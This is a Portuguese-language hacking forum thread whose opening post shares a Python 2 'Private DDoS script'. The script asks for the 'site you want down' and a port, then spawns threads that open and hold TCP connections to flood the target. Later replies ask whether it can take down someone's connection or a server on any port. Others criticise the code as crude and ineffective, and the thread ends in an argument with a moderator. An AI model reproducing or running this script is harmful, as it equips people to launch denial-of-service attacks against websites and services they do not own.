Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Private DDoS script

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Python Private DDoS script

    Lembrando que para usar tem que ter Python instalado no pc no mais é so colocar o site e a porta geralmente a 80

    Código:
    from os import *
    from socket import *
    from string import *
    from random import *
    from time import *
    from thread import *
    
    print "\a"
    print \
    """
       ********        *****       ******* 
       *********     *********    *********
       **** *****   ****  ****   ****  *****
       ****  ****  ****    ****  ****   ****
      ****   ****  ****    ****  ******     
      ****   **** ****     ****   *******   
      ****   **** ****     ****    ******* 
      ****  ***** ****    ****        *****
      ****  ****  ****    ****  ****   ****
    ****  *****   ****  ****   ****   ****
    **********    *********     ********* 
    *********       ******       *******     
    """
    print "\nWelcome to DOS.. Make sure you have read the README. Have fun!"
    print "\nRemember I am NOT responsible for what you do with this!"
    print "\nREMEMBER RUNING MORE THAN TWO INSTANCES OF THIS WILL LAG YOU!"
    
    host = raw_input("Site you want down: ")
    port = input("Port number: ")
    
    
    
    def connect(i):
        try:
            sock1 = socket(AF_INET, SOCK_STREAM)
            sock1.connect((host, port))
            sleep(99999)
            sock1.close
        except:
            print "The site is down"
    
    n = 0
    
    
    while 1:
        try:
            start_new_thread(connect, (n,))
        except:
            print "Connection Lost. Restart DOS"
        print "FLOODING!"
        sleep(0.1)

  • Font Size
    #2
    é bem simples, mas funcional

    mas nao me venha dizer que é priv, pq dá pra fazer um desse em 20 min


    vlw

    Comment


    • Font Size
      #3
      Instalando e utilizando scripts em Python:
      Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
      ~# Criado pela [IN]Segurança #~

      Comment


      • Font Size
        #4
        <> Dúvida <>

        Eu derrubaria a internet de alguém com isto ?

        Usando minha internet e meu computador ?

        Comment


        • Font Size
          #5
          <Dúvida>

          Eu conseguiria derruba qualquer coisa sabendo a porta? Tipo..

          Um server funcionando na porta 5678. Eu conseguiria derruba-lo?

          Parabéns Otimo post!

          Comment


          • Font Size
            #6
            Bem, me corrija se eu estiver errado, mas achei alguns erro aew...

            você importou os módulos random e os sendo que não os usa durate o programa...

            você colocou um argumento i na função connect, o que vem a ser atoa já que você não usa o argumento i dentro da função, logo você pode tirar o n que você também passa quando cria a thread e também o n=0 já que não vai precisar dele.

            Você imprime "FLOODING!" conseguindo ou não conectar, ou seja, mesmo se não estiver floodando, você vai manda a menssagem como se estivesse.
            Att,

            [A]ntharaz



            sigpic

            Comment


            • Font Size
              #7
              Script funcional, mas porque ele não roda direto, depois de 5 min ele dá mensagem restart DOs.
              Alguma mudança pode ser feita no codigo para que ele rode direto sem parar?

              Grato"!

              Comment


              • Font Size
                #8
                o script é inútil '-'

                1º - vc importou todas as funções da lib time, mas só usou o sleep, importou todas da lib OS, mas nao usou nenhuma da lib OS, assim como string e random,
                e do socket... podia apenas... from socket import... x,y,z...
                from

                2º - ficar conectando e ao mesmo tempo desconectando em um webserver... só vai fazer perder teu tempo, talvez em um 'servidor da xuxa' ao menos sirva para fazer barulho

                3º - se vc iniciar excessivas threads, vai consumir processamento de modo inútil

                4º - sleep(99999)(27 minutos), sério? ¬¬
                legal cara, iniciar várias threads q vão se conectar ao server... fica lá de bobeira esse tempo todo enquanto mais threads se conectam, e outras se fecham... e... só ¬¬
                vamos supor q vc conseguiu sem travar... umas 500 conexões simultâneas, vc realmente axa q isso derruba um server cara
                sigpic

                Comment


                • Font Size
                  #9
                  Olha a data que o script foi postado "13-12-2009" sim, 500 conexões há 5 anos derrubaria muita coisa...Agora se você é o cara como diz, faz um melhor e posta aqui? Se não fizer isso, não vai passar de um lammer que fala muito e não faz nada.

                  Comment


                  • Font Size
                    #10
                    bem, então sou um lammer, porq nao vou me dar o trabalho de postar nada do tipo aqui kkkkkkkkkkkkkk
                    o máximo q tenho feito é respondido um ou dois tópicos, e esse é o máximo q farei,
                    e digo mais...
                    será q com os anos q se passaram vc aprendeu a usar o "from"???

                    e quanto a suas 500 ou 1000 conexões... só digo uma coisa... quase nulo o tráfego, só geraria um "alert conection" padrão ao server, nada mais q isso, se fosse pra FTP, até faria sentido... há, ou haviam, certos servidores de FTP q só aguentavam 10 conexões kkkkkkkkkkkkkkkkk
                    isso era ridículo, por isso acredito q nao ocorra mais, massssss... voltado ao seu superOverPowerScript... cara... tentei apenas comentar no tópico, vc deveria saber receber críticas construtivas, igual a essa, e se me acha lammer, então ok... sou lammer, agora sorria kkkkkkkkkkkkkkkkkkkkkkkkkk
                    sigpic

                    Comment


                    • Font Size
                      #11
                      Aprendi sim, nesses últimos anos me dediquei a investir em minha carreira de TI, afinal já se passaram 5 anos e passei a me dedicar também a outras linguagens. Não cometemos os mesmos erros do passado, coisa que é normal "errar". Quando mostramos algo, estamos sujeito a receber críticas (construtivas). Não tenho medo de dar a minha cara a bater. Por isso prefiro postar algo com erros, mas da minha autoria do que sair copiando e colando. Nada contra a quem faz isso, agora pior é quem só crítica e não contribui em nada. O desafio continua, posta um script seu aqui com alguma coisa útil, já que o meu como você se referiu é inútil.

                      Comment


                      • Font Size
                        #12
                        Olha a data que o script foi postado "13-12-2009" sim, 500 conexões há 5 anos derrubaria muita coisa...Agora se você é o cara como diz, faz um melhor e posta aqui? Se não fizer isso, não vai passar de um lammer que fala muito e não faz nada.
                        Isso de alguém q diz saber receber críticas, uhum ta "Serto" kkkkkk

                        desafio? não não, não há desafio, só há vc querendo q eu poste algo, e já lhe disse q não
                        se pra vc isso é um desafio, então... show... vc ganhou olha q legal ^^
                        sigpic

                        Comment


                        • Font Size
                          #13
                          Vamos parar com essa discussão sem pé nem cabeça por favor.

                          O amigo que postou muito obrigado. e ao amigo que não postou, criticou e ainda disse que não iria postar nada aqui... Peço que contenha-se!

                          Não quero tomar medidas mais severas como fechar o tópico ou dar infração em alguém..
                          Então peço aos 2 que parem com a mesma. Obrigado.

                          Se me bloqueiam de um lado, eu me infiltro do outro
                          Eu sou pior que um rato eu entro pelo esgoto
                          Voltei de preto pro combate sem medo de apanhar
                          Eu não sou Jesus Cristo então vou revidar!





                          É meu fan? Use minha fan bar




                          A nossa maior glória não reside no fato de nunca cairmos, mas sim em levantarmo-nos sempre depois de cada queda.

                          Comment


                          • Font Size
                            #14
                            +1 crítica

                            dessa vez à vc "mercer"

                            1 - antes de vc falar mal de minha crítica, ANALISE VC, o script dele, e dps leia a minha primeira publicação sobre o mesmo, vc foi posto como gerente, mas parece nao entender a diferença entre "Gerencia" e "Contorno", gerencia precisa de medidas baseadas em análise, e vc no entanto está tentando contornar com uma hilária ameaça de infração

                            2 - trancar o tópico, ou simplesmente a sua publicação mercer, é prejudicial à vc e ao fórum.

                            2.1 - prejudica à vc, a partir do momento q expõe sua "não qualidade" como gerente e mostrando q sua alternativa nem se quer teve exposição de opnião

                            2.2 - prejudica o fórum a partir do momento em q os "novatos" creem q o script é funcional, prejudica tmbm porque alguns podem ficar intimidados e nao haverá publicação por parte deles, nao criticar um tópico ruim, não é ser educado, É SER OMISSO, "para q o mal triunfe, só é preciso q os bons nao façam nada"

                            3 - disse q nao publicaria material algum aqui, e confirmo mais uma vez kkk
                            porq... de q adianta? a maioria ve... nao testa e dps publica coisas como "funcional", "show, muito bom", MAS NEM SE DEU AO TRABALHO DE TESTAR!!!
                            muito menos de analisar o código, falando nisso... volto a perguntar... analisou o código do script e a minha publicação? kkkk

                            enfim... dei continuidade, era oq vc estava esperando para me dar infração?
                            vá em frente, há mais pessoas q já viram, estão vendo ou irão ver o tópico, entende oq quero dizer?

                            aaah, e só pra finalizar... "sem pé nem cabeça"?
                            hum... então vc é o gerente q nao preza por qualidade de conteúdo? e_e
                            OK
                            sigpic

                            Comment


                            • Font Size
                              #15
                              Postado Originalmente por n0x_4rc4n4 Ver Post
                              dessa vez à vc "mercer"

                              1 - antes de vc falar mal de minha crítica, ANALISE VC, o script dele, e dps leia a minha primeira publicação sobre o mesmo, vc foi posto como gerente, mas parece nao entender a diferença entre "Gerencia" e "Contorno", gerencia precisa de medidas baseadas em análise, e vc no entanto está tentando contornar com uma hilária ameaça de infração

                              2 - trancar o tópico, ou simplesmente a sua publicação mercer, é prejudicial à vc e ao fórum.

                              2.1 - prejudica à vc, a partir do momento q expõe sua "não qualidade" como gerente e mostrando q sua alternativa nem se quer teve exposição de opnião

                              2.2 - prejudica o fórum a partir do momento em q os "novatos" creem q o script é funcional, prejudica tmbm porque alguns podem ficar intimidados e nao haverá publicação por parte deles, nao criticar um tópico ruim, não é ser educado, É SER OMISSO, "para q o mal triunfe, só é preciso q os bons nao façam nada"

                              3 - disse q nao publicaria material algum aqui, e confirmo mais uma vez kkk
                              porq... de q adianta? a maioria ve... nao testa e dps publica coisas como "funcional", "show, muito bom", MAS NEM SE DEU AO TRABALHO DE TESTAR!!!
                              muito menos de analisar o código, falando nisso... volto a perguntar... analisou o código do script e a minha publicação? kkkk

                              enfim... dei continuidade, era oq vc estava esperando para me dar infração?
                              vá em frente, há mais pessoas q já viram, estão vendo ou irão ver o tópico, entende oq quero dizer?

                              aaah, e só pra finalizar... "sem pé nem cabeça"?
                              hum... então vc é o gerente q nao preza por qualidade de conteúdo? e_e
                              OK


                              1º: Que não ameacei dar infração pela postagem de opinião, e sim se o mesmo continua-se.
                              Aprenda a ler direitinho antes de ficar falando...

                              2º: Eu como gerente tenho dever de estar averiguando tudo o que acontece no fórum, e se você é tão culto quanto escreve, deveria ao menos notar que o tópico em questão é mais do que antigo, sendo assim uma discussão desnecessária de sua parte!

                              3º: Por ser gerente não preciso manjar de todas as linguagens de programação, como é o caso.

                              4º: Se não quer ajudar não ajude, mais também não atrapalhe! Muito ajuda quem não atrapalha!

                              5º: Por último mais não menos importante... Acabei de aplicar uma infração em você, e caso não tenha gostado, leia as regras, aí entenderás o porque da infração ta bem.

                              Caso mesmo lendo as regras não tenha conseguido entender o motivo da infração ou quiser reclamar a um superior, fala com o Bruno_menor, Mirage, ou Nickguitar.dll, abre um ticket, faz um chamado, esperneia ou qualquer coisa do gênero blz?

                              E sobre qualidade de conteúdo ainda não vi nada seu que se encaixe nesse rótulo amigo, quer mostrar que é bom nisso ou aquilo, faça postagens, aqui é um fórum, um local para ajudar e ser ajudado!

                              Se me bloqueiam de um lado, eu me infiltro do outro
                              Eu sou pior que um rato eu entro pelo esgoto
                              Voltei de preto pro combate sem medo de apanhar
                              Eu não sou Jesus Cristo então vou revidar!





                              É meu fan? Use minha fan bar




                              A nossa maior glória não reside no fato de nunca cairmos, mas sim em levantarmo-nos sempre depois de cada queda.

                              Comment

                              X
                              Working...
                              X